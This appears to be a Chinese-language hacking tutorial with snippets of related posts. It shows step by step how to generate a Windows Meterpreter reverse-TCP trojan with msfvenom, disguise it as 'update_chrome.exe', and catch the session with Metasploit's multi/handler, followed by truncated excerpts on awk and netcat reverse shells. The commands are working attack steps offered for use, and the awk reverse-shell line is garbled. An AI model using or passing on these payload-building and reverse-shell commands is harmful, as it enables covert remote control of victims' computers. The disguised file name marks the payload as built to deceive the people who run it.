一、在kali終端執行下面命令,生成木馬。payload:/windows/meterpreter/reverse_https
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.72 lport=6666 -f exe > update_chrome.exe #名稱隨意
lhost: 本地監聽ip
lport: 本地監聽埠
-f 生成檔案型別 exe 為windows ,elf 為shell
二、開啟msf控制台,監聽本地埠。
use exploit /multi/handler
set lhost 192.168.1.72
set lport 6666
set payload windows/meterpreter/reverse_tcp
exploit
windows 電腦上執行update_chrome.exe 程式後控制台自動登入windows系統。
反彈shell集錦
就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...
反彈shell方法記錄
一 基於awk hacker機器上執行命令 nc l port hacker機器一直監聽某埠。在受害主機上執行命令 awk begin while c exit close s dev n 受害主機主動向hacker傳送shell連線。二 純nc hacker機器上執行命令 nc l port ha...
使用NC命令反彈Shell
本文使用兩台電腦操作,一台是kali 192.168.0.23 一台是mac 192.168.0.24 有些電腦不支援,而且跟機器使用順序還有關係。比如我在kali上 192.168.0.23 輸入 root kali nc l 1234在mac上 192.168.0.24 輸入 nc 192.16...